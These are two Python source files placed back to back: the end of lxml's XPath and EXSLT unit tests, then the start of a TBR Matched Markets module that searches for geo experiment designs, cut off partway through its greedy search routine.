def foo(evaluator, a):
return 'hello %s' % a
extension = {(None, 'foo'): foo}
tree = self.parse('<a><b></b></a>')
e = etree.XPathEvaluator(tree, extensions=[extension])
self.assertEquals(
"hello you", e("foo('you')"))
def test_xpath_extensions_wrong_args(self):
def foo(evaluator, a, b):
return "hello %s and %s" % (a, b)
extension = {(None, 'foo'): foo}
tree = self.parse('<a><b></b></a>')
e = etree.XPathEvaluator(tree, extensions=[extension])
self.assertRaises(TypeError, e, "foo('you')")
def test_xpath_extensions_error(self):
def foo(evaluator, a):
return 1/0
extension = {(None, 'foo'): foo}
tree = self.parse('<a/>')
e = etree.XPathEvaluator(tree, extensions=[extension])
self.assertRaises(ZeroDivisionError, e, "foo('test')")
def test_xpath_extensions_nodes(self):
def f(evaluator, arg):
r = etree.Element('results')
b = etree.SubElement(r, 'result')
b.text = 'Hoi'
b = etree.SubElement(r, 'result')
b.text = 'Dag'
return r
x = self.parse('<a/>')
e = etree.XPathEvaluator(x, extensions=[{(None, 'foo'): f}])
r = e("foo('World')/result")
self.assertEquals(2, len(r))
self.assertEquals('Hoi', r[0].text)
self.assertEquals('Dag', r[1].text)
def test_xpath_extensions_nodes_append(self):
def f(evaluator, nodes):
r = etree.SubElement(nodes[0], 'results')
b = etree.SubElement(r, 'result')
b.text = 'Hoi'
b = etree.SubElement(r, 'result')
b.text = 'Dag'
return r
x = self.parse('<a/>')
e = etree.XPathEvaluator(x, extensions=[{(None, 'foo'): f}])
r = e("foo(/*)/result")
self.assertEquals(2, len(r))
self.assertEquals('Hoi', r[0].text)
self.assertEquals('Dag', r[1].text)
def test_xpath_extensions_nodes_append2(self):
def f(evaluator, nodes):
r = etree.Element('results')
b = etree.SubElement(r, 'result')
b.text = 'Hoi'
b = etree.SubElement(r, 'result')
b.text = 'Dag'
r.append(nodes[0])
return r
x = self.parse('<result>Honk</result>')
e = etree.XPathEvaluator(x, extensions=[{(None, 'foo'): f}])
r = e("foo(/*)/result")
self.assertEquals(3, len(r))
self.assertEquals('Hoi', r[0].text)
self.assertEquals('Dag', r[1].text)
self.assertEquals('Honk', r[2].text)
def test_xpath_context_node(self):
tree = self.parse('<root><a/><b><c/></b></root>')
check_call = []
def check_context(ctxt, nodes):
self.assertEquals(len(nodes), 1)
check_call.append(nodes[0].tag)
self.assertEquals(ctxt.context_node, nodes[0])
return True
find = etree.XPath("//*[p:foo(.)]",
namespaces={'p' : 'ns'},
extensions=[{('ns', 'foo') : check_context}])
find(tree)
check_call.sort()
self.assertEquals(check_call, ["a", "b", "c", "root"])
def test_xpath_eval_context_propagation(self):
tree = self.parse('<root><a/><b><c/></b></root>')
check_call = {}
def check_context(ctxt, nodes):
self.assertEquals(len(nodes), 1)
tag = nodes[0].tag
# empty during the "b" call, a "b" during the "c" call
check_call[tag] = ctxt.eval_context.get("b")
ctxt.eval_context[tag] = tag
return True
find = etree.XPath("//b[p:foo(.)]/c[p:foo(.)]",
namespaces={'p' : 'ns'},
extensions=[{('ns', 'foo') : check_context}])
result = find(tree)
self.assertEquals(result, [tree.getroot()[1][0]])
self.assertEquals(check_call, {'b':None, 'c':'b'})
def test_xpath_eval_context_clear(self):
tree = self.parse('<root><a/><b><c/></b></root>')
check_call = {}
def check_context(ctxt):
check_call["done"] = True
# context must be empty for each new evaluation
self.assertEquals(len(ctxt.eval_context), 0)
ctxt.eval_context["test"] = True
return True
find = etree.XPath("//b[p:foo()]",
namespaces={'p' : 'ns'},
extensions=[{('ns', 'foo') : check_context}])
result = find(tree)
self.assertEquals(result, [tree.getroot()[1]])
self.assertEquals(check_call["done"], True)
check_call.clear()
find = etree.XPath("//b[p:foo()]",
namespaces={'p' : 'ns'},
extensions=[{('ns', 'foo') : check_context}])
result = find(tree)
self.assertEquals(result, [tree.getroot()[1]])
self.assertEquals(check_call["done"], True)
def test_xpath_variables(self):
x = self.parse('<a attr="true"/>')
e = etree.XPathEvaluator(x)
expr = "/a[@attr=$aval]"
r = e(expr, aval=1)
self.assertEquals(0, len(r))
r = e(expr, aval="true")
self.assertEquals(1, len(r))
self.assertEquals("true", r[0].get('attr'))
r = e(expr, aval=True)
self.assertEquals(1, len(r))
self.assertEquals("true", r[0].get('attr'))
def test_xpath_variables_nodeset(self):
x = self.parse('<a attr="true"/>')
e = etree.XPathEvaluator(x)
element = etree.Element("test-el")
etree.SubElement(element, "test-sub")
expr = "$value"
r = e(expr, value=element)
self.assertEquals(1, len(r))
self.assertEquals(element.tag, r[0].tag)
self.assertEquals(element[0].tag, r[0][0].tag)
def test_xpath_extensions_mix(self):
x = self.parse('<a attr="true"><test/></a>')
class LocalException(Exception):
pass
def foo(evaluator, a, varval):
etree.Element("DUMMY")
if varval == 0:
raise LocalException
elif varval == 1:
return ()
elif varval == 2:
return None
elif varval == 3:
return a[0][0]
a = a[0]
if a.get("attr") == str(varval):
return a
else:
return etree.Element("NODE")
extension = {(None, 'foo'): foo}
e = etree.XPathEvaluator(x, extensions=[extension])
del x
self.assertRaises(LocalException, e, "foo(., 0)")
self.assertRaises(LocalException, e, "foo(., $value)", value=0)
r = e("foo(., $value)", value=1)
self.assertEqual(len(r), 0)
r = e("foo(., 1)")
self.assertEqual(len(r), 0)
r = e("foo(., $value)", value=2)
self.assertEqual(len(r), 0)
r = e("foo(., $value)", value=3)
self.assertEqual(len(r), 1)
self.assertEqual(r[0].tag, "test")
r = e("foo(., $value)", value="false")
self.assertEqual(len(r), 1)
self.assertEqual(r[0].tag, "NODE")
r = e("foo(., 'false')")
self.assertEqual(len(r), 1)
self.assertEqual(r[0].tag, "NODE")
r = e("foo(., 'true')")
self.assertEqual(len(r), 1)
self.assertEqual(r[0].tag, "a")
self.assertEqual(r[0][0].tag, "test")
r = e("foo(., $value)", value="true")
self.assertEqual(len(r), 1)
self.assertEqual(r[0].tag, "a")
self.assertRaises(LocalException, e, "foo(., 0)")
self.assertRaises(LocalException, e, "foo(., $value)", value=0)
class ETreeXPathClassTestCase(HelperTestCase):
"Tests for the XPath class"
def test_xpath_compile_doc(self):
x = self.parse('<a attr="true"/>')
expr = etree.XPath("/a[@attr != 'true']")
r = expr(x)
self.assertEquals(0, len(r))
expr = etree.XPath("/a[@attr = 'true']")
r = expr(x)
self.assertEquals(1, len(r))
expr = etree.XPath( expr.path )
r = expr(x)
self.assertEquals(1, len(r))
def test_xpath_compile_element(self):
x = self.parse('<a><b/><c/></a>')
root = x.getroot()
expr = etree.XPath("./b")
r = expr(root)
self.assertEquals(1, len(r))
self.assertEquals('b', r[0].tag)
expr = etree.XPath("./*")
r = expr(root)
self.assertEquals(2, len(r))
def test_xpath_compile_vars(self):
x = self.parse('<a attr="true"/>')
expr = etree.XPath("/a[@attr=$aval]")
r = expr(x, aval=False)
self.assertEquals(0, len(r))
r = expr(x, aval=True)
self.assertEquals(1, len(r))
def test_xpath_compile_error(self):
self.assertRaises(SyntaxError, etree.XPath, '\\fad')
def test_xpath_elementtree_error(self):
self.assertRaises(ValueError, etree.XPath('*'), etree.ElementTree())
class ETreeXPathExsltTestCase(HelperTestCase):
"Tests for the EXSLT support in XPath (requires libxslt 1.1.25+)"
NSMAP = dict(
date = "http://exslt.org/dates-and-times",
math = "http://exslt.org/math",
set = "http://exslt.org/sets",
str = "http://exslt.org/strings",
)
def test_xpath_exslt_functions_date(self):
tree = self.parse('<a><b>2009-11-12</b><b>2008-12-11</b></a>')
match_dates = tree.xpath('//b[date:year(string()) = 2009]',
namespaces=self.NSMAP)
self.assertTrue(match_dates, str(match_dates))
self.assertEquals(len(match_dates), 1, str(match_dates))
self.assertEquals(match_dates[0].text, '2009-11-12')
def test_xpath_exslt_functions_strings(self):
tree = self.parse('<a><b>2009-11-12</b><b>2008-12-11</b></a>')
match_date = tree.xpath('str:replace(//b[1], "-", "*")',
namespaces=self.NSMAP)
self.assertTrue(match_date, str(match_date))
self.assertEquals(match_date, '2009*11*12')
class ETreeETXPathClassTestCase(HelperTestCase):
"Tests for the ETXPath class"
def test_xpath_compile_ns(self):
x = self.parse('<a><b xmlns="nsa"/><b xmlns="nsb"/></a>')
expr = etree.ETXPath("/a/{nsa}b")
r = expr(x)
self.assertEquals(1, len(r))
self.assertEquals('{nsa}b', r[0].tag)
expr = etree.ETXPath("/a/{nsb}b")
r = expr(x)
self.assertEquals(1, len(r))
self.assertEquals('{nsb}b', r[0].tag)
# disabled this test as non-ASCII characters in namespace URIs are
# not acceptable
def _test_xpath_compile_unicode(self):
x = self.parse(_bytes('<a><b xmlns="http://nsa/\\uf8d2"/><b xmlns="http://nsb/\\uf8d1"/></a>'
).decode("unicode_escape"))
expr = etree.ETXPath(_bytes("/a/{http://nsa/\\uf8d2}b").decode("unicode_escape"))
r = expr(x)
self.assertEquals(1, len(r))
self.assertEquals(_bytes('{http://nsa/\\uf8d2}b').decode("unicode_escape"), r[0].tag)
expr = etree.ETXPath(_bytes("/a/{http://nsb/\\uf8d1}b").decode("unicode_escape"))
r = expr(x)
self.assertEquals(1, len(r))
self.assertEquals(_bytes('{http://nsb/\\uf8d1}b').decode("unicode_escape"), r[0].tag)
SAMPLE_XML = etree.parse(BytesIO("""
<body>
<tag>text</tag>
<section>
<tag>subtext</tag>
</section>
<tag />
<tag />
</body>
"""))
def tag(elem):
return elem.tag
def tag_or_value(elem):
return getattr(elem, 'tag', elem)
def stringTest(ctxt, s1):
return "Hello "+s1
def stringListTest(ctxt, s1):
return ["Hello "] + list(s1) + ["!"]
def floatTest(ctxt, f1):
return f1+4
def booleanTest(ctxt, b1):
return not b1
def setTest(ctxt, st1):
return st1[0]
def setTest2(ctxt, st1):
return st1[0:2]
def argsTest1(ctxt, s, f, b, st):
return ", ".join(map(str, (s, f, b, list(map(tag, st)))))
def argsTest2(ctxt, st1, st2):
st1.extend(st2)
return st1
def resultTypesTest(ctxt):
return [None,None]
def resultTypesTest2(ctxt):
return resultTypesTest
uri = "http://www.example.com/"
extension = {(None, 'stringTest'): stringTest,
(None, 'stringListTest'): stringListTest,
(None, 'floatTest'): floatTest,
(None, 'booleanTest'): booleanTest,
(None, 'setTest'): setTest,
(None, 'setTest2'): setTest2,
(None, 'argsTest1'): argsTest1,
(None, 'argsTest2'): argsTest2,
(None, 'resultTypesTest'): resultTypesTest,
(None, 'resultTypesTest2'): resultTypesTest2,}
def xpath():
"""
Test xpath extension functions.
>>> root = SAMPLE_XML
>>> e = etree.XPathEvaluator(root, extensions=[extension])
>>> e("stringTest('you')")
'Hello you'
>>> e(_bytes("stringTest('\\\\xe9lan')").decode("unicode_escape"))
u'Hello \\xe9lan'
>>> e("stringTest('you','there')")
Traceback (most recent call last):
...
TypeError: stringTest() takes exactly 2 arguments (3 given)
>>> e("floatTest(2)")
6.0
>>> e("booleanTest(true())")
False
>>> list(map(tag, e("setTest(/body/tag)")))
['tag']
>>> list(map(tag, e("setTest2(/body/*)")))
['tag', 'section']
>>> list(map(tag_or_value, e("stringListTest(/body/tag)")))
['Hello ', 'tag', 'tag', 'tag', '!']
>>> e("argsTest1('a',1.5,true(),/body/tag)")
"a, 1.5, True, ['tag', 'tag', 'tag']"
>>> list(map(tag, e("argsTest2(/body/tag, /body/section)")))
['tag', 'section', 'tag', 'tag']
>>> e("resultTypesTest()")
Traceback (most recent call last):
...
XPathResultError: This is not a supported node-set result: None
>>> try:
... e("resultTypesTest2()")
... except etree.XPathResultError:
... print("Got error")
Got error
"""
if sys.version_info[0] >= 3:
xpath.__doc__ = xpath.__doc__.replace(" u'", " '")
xpath.__doc__ = xpath.__doc__.replace(" XPathResultError",
" lxml.etree.XPathResultError")
xpath.__doc__ = xpath.__doc__.replace(" exactly 2 arguments",
" exactly 2 positional arguments")
def test_suite():
suite = unittest.TestSuite()
suite.addTests([unittest.makeSuite(ETreeXPathTestCase)])
suite.addTests([unittest.makeSuite(ETreeXPathClassTestCase)])
if etree.LIBXSLT_COMPILED_VERSION >= (1,1,25):
suite.addTests([unittest.makeSuite(ETreeXPathExsltTestCase)])
suite.addTests([unittest.makeSuite(ETreeETXPathClassTestCase)])
suite.addTests([doctest.DocTestSuite()])
suite.addTests(
[make_doctest('../../../doc/xpathxslt.txt')])
return suite
if __name__ == '__main__':
print('to test use test.py %s' % __file__)
|
|
# Copyright 2020 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""TBR Matched Markets preanalysis.
"""
import copy
import itertools
from typing import Generator, List, NewType, Set, TypeVar
from matched_markets.methodology import geoeligibility
from matched_markets.methodology import heapdict
from matched_markets.methodology import tbrmmdata
from matched_markets.methodology import tbrmmdesign
from matched_markets.methodology import tbrmmdesignparameters
from matched_markets.methodology import tbrmmdiagnostics
from matched_markets.methodology import tbrmmscore
import numpy as np
import pandas as pd
from scipy import special as scipy_special
TBRMMDesignParameters = tbrmmdesignparameters.TBRMMDesignParameters
TBRMMDiagnostics = tbrmmdiagnostics.TBRMMDiagnostics
TBRMMData = tbrmmdata.TBRMMData
TBRMMDesign = tbrmmdesign.TBRMMDesign
TBRMMScore = tbrmmscore.TBRMMScore
GeoID = NewType('GeoID', str)
GeoIndex = NewType('GeoIndex', int)
DictKey = TypeVar('DictKey', str, int, float)
class TBRMatchedMarkets:
"""TBR Matched Market preanalysis.
Attributes:
data: The TBRMMData object.
parameters: The TBRMMDesignParameters object.
geo_req_impact: Required minimum incremental impact for each individual geo.
"""
data: TBRMMData
parameters: TBRMMDesignParameters
geo_req_impact: pd.Series
def __init__(self, data: TBRMMData, parameters: TBRMMDesignParameters):
"""Initialize a TBRMatchedMarkets object.
Args:
data: A TBRMMData object.
parameters: a TBRMMDesignParameters object.
"""
def estimate_required_impact(y):
return TBRMMDiagnostics(y,
parameters).estimate_required_impact(
parameters.rho_max)
# Consider only the most recent n_pretest_max time points
data.df = data.df.iloc[:, -parameters.n_pretest_max:]
# Calculate the required impact estimates for each geo.
geo_req_impact = data.df.apply(estimate_required_impact, axis=1)
self.geo_req_impact = geo_req_impact
self.data = data
self.parameters = parameters
@property
def geos_over_budget(self) -> Set[GeoID]:
"""Identify geos which do not satisfy the max ad spend budget condition."""
if self.parameters.budget_range is not None:
max_impact = self.parameters.budget_range[1] * self.parameters.iroas
geo_impact = self.geo_req_impact
geos = set(geo_impact.index[geo_impact > max_impact])
else:
geos = set()
return geos
@property
def geos_too_large(self) -> Set[GeoID]:
"""Identify geos which do not satisfy the maximum geo share condition."""
if self.parameters.treatment_share_range is not None:
max_trt_share = self.parameters.treatment_share_range[1]
geo_share = self.data.geo_share
geos = set(geo_share.index[geo_share > max_trt_share])
else:
geos = set()
return geos
@property
def geos_must_include(self) -> Set[GeoID]:
"""Set of geos that must be included in each design."""
geo_assignments = self.data.geo_eligibility.get_eligible_assignments()
return geo_assignments.all - geo_assignments.x
@property
def geos_within_constraints(self) -> Set[GeoID]:
"""Set of geos that are within the geo-specific constraints.
Returns:
Geos that are assignable to control or treatment but not over budget nor
too large, plus those that must be assigned to the treatment or control
group (even if over budget or too large). If the maximum number is
specified, the geos with the highest impact on budget are chosen.
"""
geos_exceed_size = self.geos_too_large | self.geos_over_budget
geos = (self.data.assignable - geos_exceed_size) | self.geos_must_include
n_geos_max = self.parameters.n_geos_max
if n_geos_max is not None and len(geos) > n_geos_max:
geos_with_max_impact = list(
self.geo_req_impact.sort_values(ascending=False).index)
geos_in_order = list(geo for geo in geos_with_max_impact if geo in geos)
geos = set(geos_in_order[:n_geos_max])
return geos
@property
def geo_assignments(self) -> geoeligibility.GeoAssignments:
"""Return the possible geo assignments."""
geos_included = self.geos_within_constraints
# Order geos in the order of implied budget size ('expensive' first).
geos_in_order = list(self.geo_req_impact.index)
geo_index = [geo for geo in geos_in_order if geo in geos_included]
self.data.geo_index = geo_index
return self.data.geo_assignments
def treatment_group_size_range(self) -> range:
"""Range from smallest to largest possible treatment group size."""
n_treatment_min = max(1, len(self.geo_assignments.t_fixed))
n_treatment_max = len(self.geo_assignments.t)
if not self.geo_assignments.cx | self.geo_assignments.c_fixed:
# No geos left outside the group 't', so reserve at least one geo for the
# control group.
n_treatment_max -= 1
treatment_geos_range = self.parameters.treatment_geos_range
if treatment_geos_range is None:
n_geos_from, n_geos_to = (n_treatment_min, n_treatment_max)
else:
n_geos_from = max(treatment_geos_range[0], n_treatment_min)
n_geos_to = min(treatment_geos_range[1], n_treatment_max)
return range(n_geos_from, n_geos_to + 1)
def _control_group_size_generator(
self,
n_treatment_geos: int) -> Generator[int, None, None]:
"""Acceptable control group sizes, given treatment group size.
Args:
n_treatment_geos: Number of treatment geos.
Yields:
Control group sizes that agree with the range and ratio constraints.
"""
n_control_min = max(1, len(self.geo_assignments.c_fixed))
n_control_max = len(self.geo_assignments.c)
control_geos_range = self.parameters.control_geos_range
if control_geos_range is None:
n_geos_from, n_geos_to = (n_control_min, n_control_max)
else:
n_geos_from = max(control_geos_range[0], n_control_min)
n_geos_to = min(control_geos_range[1], n_control_max)
if self.parameters.geo_ratio_tolerance is None:
yield from range(n_geos_from, n_geos_to + 1)
else:
geo_tol_max = 1.0 + self.parameters.geo_ratio_tolerance
geo_tol_min = 1.0 / geo_tol_max
for n_control_geos in range(n_geos_from, n_geos_to + 1):
geo_ratio = n_control_geos / n_treatment_geos
if geo_ratio >= geo_tol_min and geo_ratio <= geo_tol_max:
yield n_control_geos
def treatment_group_generator(
self,
n: int) -> Generator[Set[GeoIndex], None, None]:
"""Generates all possible treatment groups of given size.
The indices will generated in the order from smallest to largest, e.g.,
choosing n=2 geos out of {0, 1, 2, 3} will yield the sequence {0, 1}, {0,
2}, {0, 3}, {1, 2}, {1, 3}, {2, 3}. The indices refer to geos from largest
to smallest, i.e., geo 0 is the largest, 4 is the smallest. The fixed geos
will be added to the set.
Args:
n: Size of the treatment group.
Raises:
ValueError if n is not positive.
Yields:
Sets of geo indices, of length n each. If there are not enough geos
available, does not yield anything.
"""
if n <= 0:
raise ValueError('Treatment group size n must be positive')
fixed_treatment_geos = self.geo_assignments.t_fixed
varying_treatment_geos = self.geo_assignments.t - fixed_treatment_geos
n_remaining = n - len(fixed_treatment_geos)
if n_remaining == 0 and fixed_treatment_geos:
yield fixed_treatment_geos # pytype: disable=bad-return-type
elif n_remaining > 0:
it = itertools.combinations(varying_treatment_geos, n_remaining)
for treatment_geos_combination in it:
treatment_group = fixed_treatment_geos | set(treatment_geos_combination)
yield treatment_group # pytype: disable=bad-return-type
def control_group_generator(
self,
treatment_group: Set[GeoIndex]) -> Generator[Set[GeoIndex], None, None]:
"""Iterates over control geo combinations, given a treatment group.
Args:
treatment_group: Set of treatment geos. The sequence of control groups is
constructed from the remaining geos.
Yields:
Sets of geo indices representing control groups. If there are not enough
geos available, does not yield anything.
"""
if not treatment_group:
raise ValueError('Treatment group must not be empty')
# The treatment group must be a subset of the available treatment geos.
invalid_geo_indices = treatment_group - self.geo_assignments.t
if invalid_geo_indices:
geos = [str(geo_index) for geo_index in sorted(invalid_geo_indices)]
raise ValueError(
'Invalid treatment geo indices: ' + ', '.join(geos))
# The fixed control geos are those that belong to either 'c_fixed' or 'ct'.
# The geos in the group 'ct' must be assigned to control or treatment, but
# not excluded.
ct_geos_not_in_treatment = self.geo_assignments.ct - treatment_group
fixed_control_geos = self.geo_assignments.c_fixed | ct_geos_not_in_treatment
possible_control_geos = self.geo_assignments.c - treatment_group
# The 'varying control geos' can be in the groups 'cx' or 'ctx' only.
varying_control_geos = possible_control_geos - fixed_control_geos
n_treatment_geos = len(treatment_group)
for n_control_geos in self._control_group_size_generator(n_treatment_geos):
n_remaining = n_control_geos - len(fixed_control_geos)
if n_remaining == 0 and fixed_control_geos:
yield fixed_control_geos # pytype: disable=bad-return-type
elif n_remaining > 0:
# If n_remaining > len(varying_control_geos), the generator will not
# return anything.
it = itertools.combinations(varying_control_geos, n_remaining)
for control_geos in it:
control_group = fixed_control_geos | set(control_geos)
yield control_group # pytype: disable=bad-return-type
def count_max_designs(self) -> int:
"""Count (fast) how many designs there are at most.
Only the group sizes and their ratio is used as a constraint.
Returns:
Maximum number of designs under the constraint of the geo eligibility
matrix, and the geo group sizes and allowed ratios.
"""
n_t_fixed = len(self.geo_assignments.t_fixed)
n_c_fixed = len(self.geo_assignments.c_fixed)
n_cx = len(self.geo_assignments.cx)
n_tx = len(self.geo_assignments.tx)
n_ct = len(self.geo_assignments.ct)
n_ctx = len(self.geo_assignments.ctx)
trt_sizes = set(self.treatment_group_size_range())
# Pre-compute the control sizes to avoid repetition within the loop.
control_group_sizes = {}
for n_trt in trt_sizes:
group_sizes = set(self._control_group_size_generator(n_trt))
control_group_sizes[n_trt] = group_sizes
n_designs = 0
# Split the space into the subspaces cx, tx, ct, ctx.
comb = scipy_special.comb
for i_ct in range(1 + n_ct):
n1 = comb(n_ct, i_ct, exact=True)
for i_tx in range(1 + n_tx):
n2 = comb(n_tx, i_tx, exact=True)
for i_ctx in range(1 + n_ctx):
n_trt = n_t_fixed + i_tx + i_ctx + i_ct
if n_trt in trt_sizes:
ctl_sizes = control_group_sizes[n_trt]
n3 = comb(n_ctx, i_ctx, exact=True)
for i_cx in range(1 + n_cx):
n4 = comb(n_cx, i_cx, exact=True)
for i_cctx in range(1 + n_ctx - i_ctx):
n_ctl = n_c_fixed + i_cx + i_cctx + (n_ct - i_ct)
if n_ctl in ctl_sizes:
n5 = comb(n_ctx - i_ctx, i_cctx, exact=True)
n_designs += n1 * n2 * n3 * n4 * n5
return n_designs
def exhaustive_search(self) -> List[TBRMMDesign]:
"""Search the design space for acceptable designs, within the constraints.
Returns:
the set of feasible designs found given the design parameters,
with their corresponding treatment/control groups and score.
"""
treatment_share_range = self.parameters.treatment_share_range
budget_range = self.parameters.budget_range
# Do not store patterns when we have the last treatment pattern size.
skip_this_trt_group_size = list(self.treatment_group_size_range()).pop()
skip_treatment_geo_patterns = []
results = heapdict.HeapDict(size=self.parameters.n_designs)
def skip_if_subset(geos: Set[GeoIndex]) -> bool:
"""Check if one of the stored geo patterns is a subset of the geos.
Args:
geos: Set of geo indices.
Returns:
bool: True if one of the stored groups is a subset of the geos.
"""
for p in skip_treatment_geo_patterns:
if set(p).issubset(geos):
return True
return False
volume_tol = self.parameters.volume_ratio_tolerance
if volume_tol is not None:
tol_min = 1.0 / (1.0 + volume_tol)
tol_max = 1.0 + volume_tol
treatment_group_sizes = self.treatment_group_size_range()
for treatment_group_size in treatment_group_sizes:
# Treatment groups are saved for the purpose of the inclusion check.
save_treatment_groups = (treatment_group_size != skip_this_trt_group_size)
treatment_groups = self.treatment_group_generator(treatment_group_size)
for treatment_group in treatment_groups:
treatment_share = self.data.aggregate_geo_share(treatment_group)
if treatment_share_range is not None:
# Skip this treatment group if the group implies too low or high share
# of response volume.
if (treatment_share > treatment_share_range[1] or
treatment_share < treatment_share_range[0]):
continue
elif skip_if_subset(treatment_group):
# If the group is a superset of a group that we already know has too
# high a share or budget, then skip this group too.
continue
y = self.data.aggregate_time_series(treatment_group)
diag = TBRMMDiagnostics(y, self.parameters)
req_impact = diag.estimate_required_impact(self.parameters.rho_max)
req_budget = req_impact / self.parameters.iroas
if budget_range is not None:
# If the budget is too high, skip this treatment group.
if req_budget > budget_range[1]:
if save_treatment_groups:
# We skip all treatment groups that are a superset of a treatment
# group that has too high an estimated budget.
skip_treatment_geo_patterns.append(treatment_group)
continue
# If the budget is too low, skip this treatment group.
elif req_budget < budget_range[0]:
continue
control_groups = self.control_group_generator(treatment_group)
for control_group in control_groups:
if volume_tol is not None:
control_share = self.data.aggregate_geo_share(control_group)
xy_share = control_share / treatment_share
if xy_share > tol_max or xy_share < tol_min:
continue
diag.x = self.data.aggregate_time_series(control_group)
corr = diag.corr # pylint: disable=unused-variable
req_impact = diag.required_impact
req_budget = req_impact / self.parameters.iroas
if (budget_range is not None and (self._constraint_not_satisfied(
req_budget, budget_range[0], budget_range[1]))):
continue
# deepcopy is needed otherwise diag.corr gets overwritten, and so
# it will not be equal to diag.score.score.corr for some reason
design_score = TBRMMScore(copy.deepcopy(diag))
score = design_score.score
if budget_range is not None:
# If the budget was specified then we use the inverse of the
# minimum detectable iROAS for the max. budget as the last value
# in the scoring, instead of using the same for a budget of 1$
iroas = req_impact / budget_range[1]
design_score.score = score._replace(inv_required_impact=1 / iroas)
# deepcopy is needed otherwise diag.corr gets overwritten, and so
# it will not be equal to diag.score.score.corr for some reason
design = TBRMMDesign(
design_score, treatment_group, control_group,
copy.deepcopy(diag))
results.push(0, design)
self._search_results = results
return self.search_results()
def search_results(self):
"""Outputs the results of the exhaustive search in a friendly format.
Returns:
results: the set of feasible designs found given the design parameters,
with their corresponding treatment/control groups and score.
"""
result = self._search_results.get_result()
output_result = []
if result:
design = result[0]
# map from geo indices to geo IDs.
for d in design:
treatment_geos = {self.data.geo_index[x] for x in d.treatment_geos}
control_geos = {self.data.geo_index[x] for x in d.control_geos}
d.treatment_geos = treatment_geos
d.control_geos = control_geos
output_result.append(d)
return output_result
@staticmethod
def _constraint_not_satisfied(parameter_value: float,
constraint_lower: float,
constraint_upper: float) -> bool:
"""Checks if the parameter value is in the interval [constraint_lower, constraint_upper]."""
return (parameter_value < constraint_lower) | (
parameter_value > constraint_upper)
def design_within_constraints(self, treatment_geos: Set[GeoIndex],
control_geos: Set[GeoIndex]):
"""Checks if a set of control/treatment geos passes all constraints.
Given a set of control and treatment geos we verify that some of their
metrics are within the bounds specified in TBRMMDesignParameters.
Args:
treatment_geos: Set of geo indices referring to the geos in treatment.
control_geos: Set of geo indices referring to the geos in control.
Returns:
False if any specified constraint is not satisfied.
"""
if self.parameters.volume_ratio_tolerance is not None:
volume_ratio = (
self.data.aggregate_geo_share(control_geos)/
self.data.aggregate_geo_share(treatment_geos))
if self._constraint_not_satisfied(
volume_ratio, 1 / (1 + self.parameters.volume_ratio_tolerance),
1 + self.parameters.volume_ratio_tolerance):
return False
if self.parameters.geo_ratio_tolerance is not None:
geo_ratio = len(control_geos) / len(treatment_geos)
if self._constraint_not_satisfied(
geo_ratio, 1 / (1 + self.parameters.geo_ratio_tolerance),
1 + self.parameters.geo_ratio_tolerance):
return False
if self.parameters.treatment_share_range is not None:
treatment_response_share = self.data.aggregate_geo_share(
treatment_geos) / self.data.aggregate_geo_share(
self.geo_assignments.all)
if self._constraint_not_satisfied(
treatment_response_share, self.parameters.treatment_share_range[0],
self.parameters.treatment_share_range[1]):
return False
if self.parameters.treatment_geos_range is not None:
num_treatment_geos = len(treatment_geos)
if self._constraint_not_satisfied(
num_treatment_geos, self.parameters.treatment_geos_range[0],
self.parameters.treatment_geos_range[1]):
return False
if self.parameters.control_geos_range is not None:
num_control_geos = len(control_geos)
if self._constraint_not_satisfied(num_control_geos,
self.parameters.control_geos_range[0],
self.parameters.control_geos_range[1]):
return False
return True
def greedy_search(self):
"""Searches the Matched Markets for a TBR experiment.
Uses a greedy hill climbing algorithm to provide recommended 'matched
markets' experimental group assignments that appear to lead to valid and
effective TBR models relative to the pretest period. This is accomplished
by using a greedy hill climbing alogirhtm that alternates between two
routines:
1) Looks for the best set of control geos given the current
set of treatment geos.
2) Adds one new geo to the set of treatment geos given
the current control group.
See Au (2018) for more details.
Returns:
the set of feasible designs found given the design parameters,
with their corresponding treatment/control groups and score.
"""
budget_range = self.parameters.budget_range
results = heapdict.HeapDict(size=self.parameters.n_designs)
if self.parameters.treatment_geos_range is None:
n_treatment = len(self.geo_assignments.t)
max_treatment_size = n_treatment
n_remaining = len(self.geo_assignments.all) - n_treatment
if n_remaining == 0:
max_treatment_size = n_treatment - 1
self.parameters.treatment_geos_range = (1, max_treatment_size)
else:
max_treatment_size = self.parameters.treatment_geos_range[1]
if self.parameters.control_geos_range is None:
n_control = len(self.geo_assignments.c)
max_control_size = n_control
n_remaining = len(self.geo_assignments.all) - n_control
if n_remaining == 0:
max_control_size = n_control - 1
self.parameters.control_geos_range = (1, max_control_size)
kappa_0 = len(self.geo_assignments.t_fixed)
group_star_trt = {kappa_0: self.geo_assignments.t_fixed}
tmp_diag = TBRMMDiagnostics(np.random.normal(range(100)), self.parameters)
tmp_diag.x = list(range(len(tmp_diag.y)))
tmp_score = TBRMMScore(tmp_diag)
tmp_score.score = tmp_score.score._replace(
corr_test=0,
aa_test=0,
bb_test=0,
dw_test=0,
corr=0,
inv_required_impact=0)
score_star = {kappa_0: tmp_score}
group_ctl = self.geo_assignments.c
if kappa_0 == 0:
group_star_ctl = {kappa_0: group_ctl}
needs_matching = False
else:
group_star_ctl = {}
needs_matching = True
k = kappa_0
while (k < max_treatment_size) | (needs_matching):
# Find the best control group given the current treatment group
if needs_matching:
r_control = self.geo_assignments.c - (group_ctl | group_star_trt[k])
r_unassigned = (group_ctl & self.geo_assignments.x) - group_star_trt[k]
reassignable_geos = r_control | r_unassigned
treatment_time_series = self.data.aggregate_time_series(
group_star_trt[k])
current_design = TBRMMDiagnostics(treatment_time_series,
self.parameters)
current_design.x = self.data.aggregate_time_series(group_ctl)
current_score = TBRMMScore(current_design)
group_ctl_tmp = group_ctl
for geo in reassignable_geos:
neighboring_control_group = group_ctl.symmetric_difference([geo])
# we skip checking constraints for designs with less than the minimum
# number of treatment geos, or above the maximum number of control
# geos. Otherwise, we will never be able to augment the size of
# treatment (to reach a size which would pass the checks) or decrease
# the size of control
if (k >= self.parameters.treatment_geos_range[0]) and (
len(neighboring_control_group) <=
self.parameters.control_geos_range[1]):
if (not neighboring_control_group) or (
not self.design_within_constraints(group_star_trt[k],
